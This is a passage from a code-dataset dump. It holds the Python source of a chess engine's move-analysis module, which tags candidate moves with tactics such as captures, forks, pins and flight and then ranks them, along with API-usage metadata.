"sklearn.metrics.r2_score", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 281, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 292, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 294, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, 
"usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 303, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 311, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 312, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 314, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 324, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 335, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 337, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 337, "usage_type": "name"}]} +{"seq_id": "2094413798", "text": "from operator import attrgetter\nimport copy\nfrom .values import *\nfrom .match import *\nfrom .move import *\nfrom .helper import reverse_lookup\nfrom .analyze_helper import *\nfrom .pieces.pawn import cPawn\nfrom .pieces.knight import cKnight\nfrom .pieces.bishop import cBishop\nfrom .pieces.rook import cRook\nfrom .pieces.king import cKing\nfrom .pieces.queen import cQueen\nfrom .pieces.piece import cTouch\nfrom .pieces.pieces_helper import obj_for_piece\nfrom .generator import cGenerator\n\n\ndef castles(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == 2 or gmove.srcx - gmove.dstx == -2):\n return True\n\n\ndef promotes(gmove):\n if(gmove.prom_piece != PIECES['blk']):\n return True\n\n\ndef captures(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n dstpiece = match.readfield(gmove.dstx, gmove.dsty)\n if(dstpiece != PIECES['blk']):\n return True\n elif( (piece == PIECES['wPw'] or piece == PIECES['bPw']) and gmove.srcx != gmove.dstx ):\n return True\n else:\n return False\n\n\ndef defends_fork(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_defend = cpiece.defends_fork()\n else:\n 
is_fork_defend = False\n match.undo_move()\n return is_fork_defend\n\n\ndef threatens_fork(gmove):\n is_fork_threat = False\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n piece = match.readfield(gmove.dstx, gmove.dsty)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n is_fork_threat = cpiece.threatens_fork()\n match.undo_move()\n return is_fork_threat\n\n\ndef flees(gmove):\n match = gmove.match\n lower_enmy_cnt_old = 0\n lower_enmy_cnt_new = 0\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wKg'] or piece == PIECES['bKg']):\n return False\n\n frdlytouches_old, enmytouches_old = list_all_field_touches(match, color, gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches_new, enmytouches_new = list_all_field_touches(match, color, gmove.dstx, gmove.dsty)\n match.undo_move()\n ###\n\n if(len(enmytouches_old) > 0 and \n (len(frdlytouches_old) < len(frdlytouches_new))):\n return True\n\n if(len(enmytouches_old) > len(enmytouches_new)):\n return True\n\n for enmy in enmytouches_old:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_old += 1\n for enmy in enmytouches_new:\n if(PIECES_RANK[enmy.piece] < PIECES_RANK[piece]):\n lower_enmy_cnt_new += 1\n if(lower_enmy_cnt_old > lower_enmy_cnt_new):\n return True\n else:\n return False\n\n\ndef find_attacks_and_supports_after_move(gmove):\n attacked = []\n supported = []\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cpiece = obj_for_piece(match, piece, gmove.dstx, gmove.dsty)\n if(cpiece):\n cpiece.find_attacks_and_supports(attacked, supported)\n \n if(cpiece.piece == PIECES['wKg'] or cpiece.piece == PIECES['bKg']):\n if(gmove.srcx - gmove.dstx == -2):\n crook = cRook(match, gmove.dstx - 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n elif(gmove.srcx - gmove.dstx == 2):\n crook = cRook(match, gmove.dstx + 1, gmove.dsty)\n crook.find_attacks_and_supports(attacked, supported)\n match.undo_move()\n ###\n return attacked, supported\n\n\ndef find_attacks_on_and_supports_of_dstfield_after_move(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n frdlytouches, enmytouches = list_all_field_touches(match, match.color_of_piece(piece), gmove.dstx, gmove.dsty)\n match.undo_move()\n return frdlytouches, enmytouches\n\n\ndef does_unpin(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n pinlines_before = search_lines_of_pin(match, color, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty)\n ###\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n pinlines_after = search_lines_of_pin(match, color, gmove.dstx, gmove.dsty, None, None)\n match.undo_move()\n ###\n if(len(pinlines_after) < len(pinlines_before)):\n return True\n for pbefore in pinlines_before:\n identical = False\n for pafter in pinlines_after:\n if(pbefore[0].fieldx == pafter[0].fieldx and pbefore[0].fieldy == pafter[0].fieldy):\n identical = True\n if(identical == False):\n return True\n return False\n\n\ndef defends_check(match):\n if(match.next_color() == COLORS['white']):\n 
cking = cKing(match, match.board.wKg_x, match.board.wKg_y)\n else:\n cking = cKing(match, match.board.bKg_x, match.board.bKg_y)\n return cking.is_attacked()\n\n\ndef check_mates(gmove):\n match = gmove.match\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n is_move_available = match.is_move_available()\n match.undo_move()\n return not is_move_available\n\n\ndef find_disclosed_pieces(match, srcx, srcy, dstx, dsty, discl_attacked, discl_supported):\n piece = match.readfield(srcx, srcy)\n color = match.color_of_piece(piece)\n idx = 0\n for step in cQueen.STEPS:\n if(idx % 2 == 0):\n first = cTouch(PIECES['blk'], 0, 0)\n second = cTouch(PIECES['blk'], 0, 0)\n if(idx < 4):\n cpiece = cRook\n excluded_dir = cRook.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wRk'], PIECES['bRk'], PIECES['wQu'], PIECES['bQu']]\n else:\n cpiece = cBishop\n excluded_dir = cBishop.dir_for_move(srcx, srcy, dstx, dsty)\n faces = [PIECES['wBp'], PIECES['bBp'], PIECES['wQu'], PIECES['bQu']]\n idx += 1\n\n stepx = step[0]\n stepy = step[1]\n direction = cpiece.dir_for_move(srcx, srcy, (srcx + stepx), (srcy + stepy))\n if(direction == excluded_dir or direction == match.REVERSE_DIRS[excluded_dir]):\n break\n x1, y1 = match.search(srcx, srcy, stepx, stepy)\n if(x1 is not None):\n piece = match.readfield(x1, y1)\n if(first.piece == PIECES['blk']):\n first.piece = piece\n first.fieldx = x1\n first.fieldy = y1\n continue\n elif(second.piece == PIECES['blk']):\n second.piece = piece\n second.fieldx = x1\n second.fieldy = y1\n\n if(first.piece == PIECES['blk'] or second.piece == PIECES['blk']):\n continue\n \n if(match.color_of_piece(first.piece) != match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_attacked.append(second)\n break\n else:\n for face in faces:\n if(second.piece == face):\n discl_attacked.append(first)\n break\n elif(match.color_of_piece(first.piece) == match.color_of_piece(second.piece)):\n if(match.color_of_piece(first.piece) == color):\n for face in faces:\n if(first.piece == face):\n discl_supported.append(second)\n break\n for face in faces:\n if(second.piece == face):\n discl_supported.append(first)\n break\n\ndef find_disclosures(match, gmove):\n discl_attacked = []\n discl_supported = []\n\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n find_disclosed_pieces(match, gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, discl_attacked, discl_supported)\n match.undo_move()\n ###\n match.writefield(gmove.srcx, gmove.srcy, PIECES['blk'])\n\n for ctouch_beyond in discl_attacked:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n for ctouch_beyond in discl_supported:\n list_field_touches_beyond(match, color, ctouch_beyond)\n\n match.writefield(gmove.srcx, gmove.srcy, piece)\n ###\n \n return discl_attacked, discl_supported\n\n\ndef blocks(gmove):\n STEPS = [ [0, 1], [1, 0], [1, 1], [-1, 1] ]\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n #frdlytouches_before_count = 0\n enmytouches_before_count = 0\n #frdlytouches_after_count = 0\n enmytouches_after_count = 0\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 
== gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_before_count += len(enmytouches)\n\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n for step in STEPS:\n stepx = step[0]\n stepy = step[1]\n x1, y1, x2, y2 = match.search_bi_dirs(gmove.dstx, gmove.dsty, stepx, stepy)\n if(x1 is not None):\n if((x1 == gmove.srcx and y1 == gmove.srcy) or\n (x2 == gmove.srcx and y2 == gmove.srcy)):\n continue\n piece1 = match.readfield(x1, y1)\n piece2 = match.readfield(x2, y2)\n if(match.color_of_piece(piece1) == match.color_of_piece(piece2)):\n continue\n if(match.color_of_piece(piece1) == color):\n frdlytouches, enmytouches = list_all_field_touches(match, color, x1, y1)\n else:\n frdlytouches, enmytouches = list_all_field_touches(match, color, x2, y2)\n enmytouches_after_count += len(enmytouches)\n\n match.undo_move()\n\n if(enmytouches_after_count < enmytouches_before_count):\n return True\n else:\n return False\n\n\ndef running_pawn_in_endgame(gmove):\n if(gmove.match.is_endgame()):\n piece = gmove.match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw'] or piece == PIECES['bPw']):\n cpawn = cPawn(gmove.match, gmove.srcx, gmove.srcy)\n return cpawn.is_running()\n return False\n\n\ndef defends_invasion(match, gmove):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n color = match.color_of_piece(piece)\n board = [[0] * 8 for i in range(8)]\n\n for y in range(8):\n for x in range(8):\n piece = match.readfield(x, y)\n if(match.color_of_piece(piece) == COLORS['white']):\n board[y][x] += 1\n elif(match.color_of_piece(piece) == COLORS['black']):\n board[y][x] -= 1\n \n return False\n\ndef controles_file(gmove):\n match = gmove.match\n piece = match.readfield(gmove.srcx, gmove.srcy)\n\n if(piece == PIECES['wBp'] or piece == PIECES['bBp']):\n cbishop = cBishop(match, gmove.srcx, gmove.srcy)\n return cbishop.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wRk'] or piece == PIECES['bRk']):\n crook = cRook(match, gmove.srcx, gmove.srcy)\n return crook.move_controles_file(gmove.dstx, gmove.dsty)\n elif(piece == PIECES['wQu'] or piece == PIECES['bQu']):\n cqueen = cQueen(match, gmove.srcx, gmove.srcy)\n return cqueen.move_controles_file(gmove.dstx, gmove.dsty)\n else:\n return False\n\ndef is_tactical_draw(gmove):\n newmatch = copy.deepcopy(gmove.match)\n newmatch.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n\n #if(newmatch.board.fifty_moves_count >= 49):\n #return True\n\n if(len(newmatch.move_list) < 9):\n return False\n\n boards = []\n for i in range(9):\n str_board = \"\"\n for y in range(8):\n for x in range(8):\n piece = newmatch.readfield(x, y)\n str_board += reverse_lookup(PIECES, piece)\n boards.append(str_board)\n newmatch.undo_move()\n\n count = 0\n str_board = boards[0]\n for i in range(1, 9):\n if(boards[i] == str_board):\n count += 1\n\n return count >= 2\n\n\ndef is_progress(gmove):\n match = gmove.match\n if(match.is_opening()):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n if(piece == PIECES['wPw']):\n if(gmove.srcy == match.board.COORD['2'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == 
PIECES['bPw']):\n if(gmove.srcy == match.board.COORD['7'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['wKn']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['bKn']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['wBp']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n elif(piece == PIECES['bBp']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n return False\n else:\n return False\n\n\ndef rank_gmoves(match, priomoves, piecescnt, last_pmove, dbggmove, dbgprio):\n all_attacking = []\n all_supporting = []\n all_fork_defending = []\n all_discl_attacking = []\n all_discl_supporting = []\n all_fleeing = []\n all_running = []\n excludes = []\n\n for priomove in priomoves:\n gmove = priomove.gmove\n from_dstfield_attacked, from_dstfield_supported = find_attacks_and_supports_after_move(gmove)\n frdlytouches_on_dstfield, enmytouches_on_dstfield = find_attacks_on_and_supports_of_dstfield_after_move(gmove)\n discl_attacked, discl_supported = find_disclosures(match, gmove)\n\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield) and \n is_piece_lfe_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n subtactic = priomove.SUB_TACTICS['bad-deal']\n\n if(defends_check(match)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and\n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['bad-deal']))\n\n if(castles(gmove)):\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cking = cKing(match, gmove.dstx, gmove.dsty)\n is_king_safe = cking.is_safe()\n match.undo_move()\n if(is_king_safe):\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['bad-deal']))\n\n if(is_tactical_draw(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-tactical-draw'], priomove.SUB_TACTICS['neutral']))\n\n if(promotes(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['promotes'], subtactic))\n\n if(captures(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] or\n is_piece_lfe_captured(gmove)):\n if(is_captured_pinned_or_soft_pinned(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], subtactic))\n\n if(does_unpin(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['unpins'], subtactic))\n\n if(defends_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-fork'], subtactic))\n all_fork_defending.append(priomove)\n\n 
if(is_fork_move(gmove, from_dstfield_attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['forks'], subtactic))\n\n if(threatens_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['threatens-fork'], subtactic))\n\n if(flees(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal']):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n friends, enemies = list_all_field_touches(match, match.color_of_piece(piece), gmove.srcx, gmove.srcy)\n if(len(friends) < len(enemies) or\n is_piece_le_attacker_on_srcfield(gmove, enemies) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['urgent']))\n elif(len(friends) == 0):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['neutral']))\n all_fleeing.append(priomove)\n\n if(len(from_dstfield_attacked) > 0):\n attack_subtactic = subtactic\n if(attack_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n attack_subtactic = priomove.SUB_TACTICS['good-deal']\n\n for attacked in from_dstfield_attacked:\n if(attacked.piece == PIECES['wKg'] or \n attacked.piece == PIECES['bKg']):\n if(check_mates(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], priomove.SUB_TACTICS['urgent']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], attack_subtactic))\n elif(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_attacked_soft_pinned(gmove, attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], attack_subtactic))\n all_attacking.append(priomove)\n\n if(len(from_dstfield_supported) > 0):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_supported_le_attacker(from_dstfield_supported)):\n support_subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n support_subtactic = priomove.SUB_TACTICS['bad-deal']\n\n for supported in from_dstfield_supported:\n if(is_supported_running_pawn(match, supported)):\n support_tactic = priomove.TACTICS['supports-running-pawn']\n elif(len(supported.attacker_beyond) > 0):\n support_tactic = priomove.TACTICS['supports']\n else:\n support_tactic = priomove.TACTICS['supports-unattacked']\n\n if(support_subtactic == priomove.SUB_TACTICS['good-deal'] and \n len(supported.attacker_beyond) > 0 and\n (is_supporter_lower_attacker(gmove, supported) or\n match.is_soft_pin(supported.fieldx, supported.fieldy)[0])):\n support_subtactic = priomove.SUB_TACTICS['urgent']\n\n priomove.tactics.append(cTactic(support_tactic, support_subtactic))\n all_supporting.append(priomove)\n\n if(len(discl_attacked) > 0):\n if(is_discl_attacked_supported(discl_attacked) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_attacking.append(priomove)\n\n if(len(discl_supported) > 0):\n if(is_discl_supported_weak(discl_supported)):\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_supporting.append(priomove)\n\n if(blocks(gmove)):\n block_subtactic = subtactic\n if(block_subtactic == priomove.SUB_TACTICS['bad-deal']):\n 
if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n block_subtactic = priomove.SUB_TACTICS['good-deal']\n priomove.tactics.append(cTactic(priomove.TACTICS['blocks'], block_subtactic))\n\n if(running_pawn_in_endgame(gmove)):\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['bad-deal']))\n all_running.append(priomove)\n\n if(controles_file(priomove.gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['controles-file'], subtactic))\n\n if(is_progress(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-progress'], priomove.SUB_TACTICS['neutral']))\n\n if(len(priomove.tactics) > 0):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n priomove.evaluate_priorities(piece)\n\n all_attacking.sort(key=attrgetter('prio'))\n for pmove in all_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(priomove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_attacking.sort(key=attrgetter('prio'))\n for pmove in all_discl_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_supporting.sort(key=attrgetter('prio'))\n for pmove in all_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_supporting.sort(key=attrgetter('prio'))\n for pmove in all_discl_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fork_defending.sort(key=attrgetter('prio'))\n for pmove in all_fork_defending:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['defends-fork'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fleeing.sort(key=attrgetter('prio'))\n for pmove in all_fleeing:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['flees'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n \"\"\"excludes.clear()\n all_running.sort(key=attrgetter('prio'))\n for pmove in all_running:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == 
False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['is-running-pawn'])\n pmove.evaluate_priorities()\"\"\"\n\n if(dbggmove):\n for priomove in priomoves:\n if(priomove.gmove.srcx == dbggmove.srcx and \n priomove.gmove.srcy == dbggmove.srcy and \n priomove.gmove.dstx == dbggmove.dstx and \n priomove.gmove.dsty == dbggmove.dsty):\n priomove.prio = dbgprio\n break\n priomoves.sort(key=attrgetter('prio'))\n", "repo_name": "richardtraindl/immanuel", "sub_path": "kate/engine/analyze_move.py", "file_name": "analyze_move.py", "file_ext": "py", "file_size_in_byte": 27269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "match.readfield", "line_number": 21, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 34, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 35, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 36, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 47, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 48, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 49, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 54, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 61, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 62, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 63, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 66, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 74, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 75, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 77, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 83, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 85, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 111, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 113, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 114, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 120, "usage_type": 